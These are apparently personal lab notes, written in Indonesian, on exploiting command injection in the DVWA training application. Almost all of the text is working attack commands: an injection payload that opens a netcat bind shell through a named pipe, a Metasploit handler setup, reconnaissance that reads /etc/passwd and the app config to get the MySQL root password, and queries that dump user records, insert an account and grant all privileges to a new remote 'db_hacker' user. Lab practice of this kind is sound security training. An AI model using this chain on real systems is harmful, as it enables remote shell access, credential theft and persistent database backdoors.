Command Injection (catatan lab DVWA)

pake biasa :

server :

$ip_terserah;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

client :

nc $ip_server 4444

pake metasploit :

server :

$ip_terserah;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

client :

msfconsole

kasih IP server

use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.43.207
exploit

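beberapa perintah bagus (password root MySQL yang dipakai di bawah sepertinya diambil dari config.inc.php yang kebaca oleh user web server; karena aplikasinya konek ke DB sebagai root, satu celah command injection langsung membuka semua database) :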

whoami
grep apache /etc/passwd
grep apache /etc/group
ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/dvwa
ls -l /var/www/html/dvwa
ls -l /var/www/html/dvwa/config
cat /var/www/html/dvwa/config/config.inc.php

echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD

mysql -u db_hacker -h 192.168.43.207 -p
show databases;
quit
date
echo "Your Name"